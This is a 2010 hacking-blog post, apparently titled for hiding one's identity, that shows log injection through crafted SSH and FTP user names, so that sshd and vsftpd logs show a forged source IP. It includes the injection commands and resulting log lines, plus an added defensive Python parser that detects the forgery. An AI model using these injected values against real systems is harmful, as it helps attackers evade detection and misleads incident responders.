
Friday, October 8, 2010


LINUX : How to inject remote log injection for hiding your ID?


We all know that we should never trust user input, especially when talking about web development, but we seem to have forgotten about it when dealing with logs.

The rule should always be: ANY user input that goes into a log SHOULD NOT be trusted!
Why do I say that? Let's look at some SSH logs to start.
When you miss a password, SSH logs the following (the second and third lines happen when you provide an invalid user name):
Jun 2 14:49:00 pctipsbyanu sshd[5862]: Failed password for root from 192.168.10.5 port 34780 ssh2
Jun 2 14:49:42 pctipsbyanu sshd[5866]: Invalid user invuser from 192.168.10.5
Jun 2 14:49:46 pctipsbyanu sshd[5866]: Failed password for invalid user invuser from 192.168.10.5 port 34786 ssh2

Note that the SSH logs have the user name and IP address related to the connection. BUT the user name is provided by the USER!

What if we provide the following username:
$ ssh "myfakeuser from 10.1.1.1 port 123 ssh2 "@192.168.5.1
What would the logs look like?

Jun 2 14:54:00 pctipsbyanu sshd[5870]: Invalid user myfakeuser from 10.1.1.1 port 123 ssh2 from 192.168.10.5
Jun 2 14:54:03 pctipsbyanu sshd[5870]: Failed password for invalid user myfakeuser from 10.1.1.1 port 123 ssh2 from 192.168.10.5 port 34813 ssh2
What about an FTP log?
(We use vsftpd as an example, but the same applies to every application.)

Take a look at the logs when we try to modify the user name:
root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): myuser
...

root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client "2.3.4.54"
...
(looking at the logs)

Mon Jun 2 21:05:30 2007 [pid 1448] [myuser] FAIL LOGIN: Client "192.168.3.1"
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client "2.3.4.54"] FAIL LOGIN: Client "192.168.3.1"
We all know SQL injection, and the idea here is no different. We are just passing the user name in a way that would trick a log analysis tool, making it think that the source IP of the connection is not what it really is.

Another very interesting thing, which we will use later on, is how SSH logs invalid protocols:
root@slacker:~# nc 192.168.3.4 22
SSH-1.99-OpenSSH_4.2
hi me
Protocol mismatch.
(looking at the logs):
Jun 2 21:27:37 slacker sshd[1457]: Bad protocol version identification 'hi me' from 192.168.3.1
Can you see the provided user string in that log?

The remaining question is: how well does your log analysis tool handle these injections?
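As an added example (not part of the original post), here is a defender-side Python parser for the sshd lines shown above. It contrasts a naive regex, which takes the first "from <ip>" and is fooled by the injected user name, with a regex anchored on the end of the line, where sshd appends the real peer address. The sample lines are constructed from the post's own output.

```python
import re

# Constructed sample lines modelled on the post's examples; not taken from a real host.
SAMPLE_LINES = [
    "Jun 2 14:49:00 pctipsbyanu sshd[5862]: Failed password for root from 192.168.10.5 port 34780 ssh2",
    "Jun 2 14:49:42 pctipsbyanu sshd[5866]: Invalid user invuser from 192.168.10.5",
    "Jun 2 14:54:00 pctipsbyanu sshd[5870]: Invalid user myfakeuser from 10.1.1.1 port 123 ssh2 from 192.168.10.5",
    "Jun 2 14:54:03 pctipsbyanu sshd[5870]: Failed password for invalid user myfakeuser from 10.1.1.1 port 123 ssh2 from 192.168.10.5 port 34813 ssh2",
]

# The fragile approach: take the first "from <ip>" that follows the user name.
# An injected user name such as "x from 10.1.1.1 port 123 ssh2 " satisfies it first.
NAIVE_RE = re.compile(r"user (\S+) from (\d{1,3}(?:\.\d{1,3}){3})")

# The anchored approach: sshd appends the real peer address at the END of the line,
# so match the trailing "from <ip>[ port <n> ssh2]" against $ and let the greedy
# user-name group absorb everything before it, injected text included.
ANCHORED_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for invalid user|Failed password for) "
    r"(?P<user>.*) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?: port (?P<port>\d+) ssh2)?$"
)

def naive_source_ip(line):
    """Return the source IP the way a naive parser would (possibly the injected one)."""
    m = NAIVE_RE.search(line)
    return m.group(2) if m else None

def parse_sshd_auth(line):
    """Parse an sshd auth-failure line, recovering the real peer IP and flagging injection."""
    m = ANCHORED_RE.search(line)
    if not m:
        return None
    user = m.group("user")
    return {
        "user": user,
        "src_ip": m.group("ip"),
        "port": m.group("port"),
        # A real login name never contains whitespace; a fake "from <ip>" fragment does.
        "suspicious": bool(re.search(r"\s", user)),
    }

def count_by_source(lines):
    """Count failures per real source IP, which is what a brute-force alert should key on."""
    counts = {}
    for line in lines:
        rec = parse_sshd_auth(line)
        if rec:
            counts[rec["src_ip"]] = counts.get(rec["src_ip"], 0) + 1
    return counts
```

Running parse_sshd_auth over SAMPLE_LINES attributes all four failures to 192.168.10.5 and marks the two injected lines as suspicious, whereas naive_source_ip reports 10.1.1.1 for them.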

Keep watching for my next post on that topic...

Thanks....
About 'Anu': My name is 'Anu', also known as 'ANU 007 TIGER'. I'm the administrator of the 'PC Tips by Anu' blog. This blog was opened for sharing content about hacking and cracking.